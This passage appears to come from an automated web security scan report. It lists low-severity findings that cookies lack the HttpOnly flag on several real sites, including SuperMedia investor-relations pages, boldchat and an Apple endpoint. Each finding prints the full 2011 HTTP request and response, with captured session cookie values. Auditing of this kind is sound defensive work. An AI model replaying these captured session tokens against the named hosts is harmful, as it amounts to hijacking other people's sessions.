Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:02 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Investor FAQs</title>

<meta http-equiv="Content-Ty
...[SNIP]...

13.14. http://ir.supermedia.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:35:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A35%3A59%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:35:59 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:35:59 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:35:59 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Investor Relations</title>

<meta http-equiv="Conte
...[SNIP]...

13.15. http://ir.supermedia.com/releasedetail.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /releasedetail.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /releasedetail.cfm?ReleaseID=546698 HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A06%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

13.16. http://ir.supermedia.com/releases.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /releases.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /releases.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A07%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:07 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:07 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:07 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Press Releases</title>

<meta http-equiv="Content-T
...[SNIP]...

13.17. http://ir.supermedia.com/results.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /results.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A03%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:04 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:04 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Quarterly Results</title>

<meta http-equiv="Conten
...[SNIP]...

13.18. http://ir.supermedia.com/rss.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /rss.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rss.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - RSS News Feeds</title>

<meta http-equiv="Content-T
...[SNIP]...

13.19. http://ir.supermedia.com/search.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /search.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A23%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Search Results</title>

<meta http-equiv="Content-T
...[SNIP]...

13.20. http://ir.supermedia.com/sec.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /sec.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sec.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A01%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:01 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - SEC Filings</title>

<meta http-equiv="Content-Type
...[SNIP]...

13.21. http://ir.supermedia.com/stockquote.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /stockquote.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stockquote.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:03 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Stock Information</title>

<meta http-equiv="Conten
...[SNIP]...

13.22. http://l0.scanscout.com/ssframework/logController.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://l0.scanscout.com
Path:   /ssframework/logController.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ssframework/logController.xml HTTP/1.1
Host: l0.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; osh=626_1296767643681; behavioralSegments=29_110203_2|32_110203_2|263_110203
Content-Length: 617

Srpc=yahoo%5Ftag%3Ascanscout%5Fus%5Fctxt%3B&Ucty=washington&a=logitemaction&VI=33687174&RmT=0&PC=0&RwT=5&ADst=B&Uctry=us&PmC=2&UareV=5%2E11%2E0%2E01&ADI=5933178&RovC=0&RrC=2&PI=626&RC=2&RvN=1&CbC=1&PR
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:14:09 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: networkInfo=57058|110203_161409|626|33687174|null|5933178|1414196|1|12.0|true|1|true|us|V|717380|2||57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: campUnique=1414196_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Set-Cookie: sssrvyhst2=110203_1414196|110203_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EC2ECA527A6D86A1BF90D5DB051B04A3; Path=/ssframework
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2

0

13.23. http://livechat.boldchat.com/aid/3760177095415339810/bc.chat  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://livechat.boldchat.com
Path:   /aid/3760177095415339810/bc.chat

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT
Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Length: 11752


   <html>
<head>
<HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" />
<!-- Overridable STYLE -->
<STYLE><!--
.print_cell, .email_cell {
   padding: 4px;
}
.email_prompt_box {
...[SNIP]...

13.24. https://livechat.boldchat.com/aid/3760177095415339810/bc.chat  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://livechat.boldchat.com
Path:   /aid/3760177095415339810/bc.chat

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.chat HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT
Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 20:32:21 GMT
Content-Length: 101191


   <html>
<head>
<HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" />
<!-- Overridable STYLE -->
<STYLE><!--
.print_cell, .email_cell {
   padding: 4px;
}
.email_prompt_box {
...[SNIP]...

13.25. http://mad4milk.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mad4milk.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:05 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2264dc0b4145e45d69276a4c3c70a5981e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296762487%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Thu, 03-Feb-2011 21:48:07 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...

13.26. https://mktws.apple.com/acdwsweb/ACDwsAction.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://mktws.apple.com
Path:   /acdwsweb/ACDwsAction.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acdwsweb/ACDwsAction.do HTTP/1.1
Host: mktws.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:47:24 GMT
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l mod_jk/1.2.26
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:48:24 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Set-Cookie: JSESSIONID=73B6AECF367E236B1FFEBC7FD237DFD7.node2; Path=/; Secure
Cache-Control: no-cache
Expires: Wed, 08 Apr 2607 23:32:54 GMT
Pragma: no-cache
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 14

null("bad");

13.27. http://my.supermedia.com/CammsServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://my.supermedia.com
Path:   /CammsServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CammsServlet?assetid=198 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/social-responsibility/corporate-governance
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:26 GMT
Set-Cookie: JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; path=/
Content-disposition: filename=1263325254349AUDIT_COMMITTEE_CHARTER.PDF
Content-Type: application/pdf
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:02 GMT;path=/;httponly
Content-Length: 37726

%PDF-1.4%....
39 0 obj <</Linearized 1/L 37726/O 41/E 9062/N 9/T 36899/H [ 616 317]>>endobj
xref
39 16
0000000016 00000 n
0000000933 00000 n
0000001050 00000 n
0000001299
...[SNIP]...

13.28. http://nowhiringtoday.jobamatic.com/a/jobs/find-jobs/q-Honda+Research+Development+America/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nowhiringtoday.jobamatic.com
Path:   /a/jobs/find-jobs/q-Honda+Research+Development+America/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/jobs/find-jobs/q-Honda+Research+Development+America/x22 HTTP/1.1
Host: nowhiringtoday.jobamatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Feb 2011 20:33:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: gc=1; expires=Fri, 04-Feb-2011 20:33:43 GMT; path=/
Set-Cookie: sess=ct%3D4d4b1127; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: sh3=id%3D9519651854d4b1127cc09b6.50218783%3Brv%3D5d4641dd%3Bcv%3D2; expires=Sat, 04-Feb-2012 20:33:43 GMT; path=/; domain=nowhiringtoday.jobamatic.com
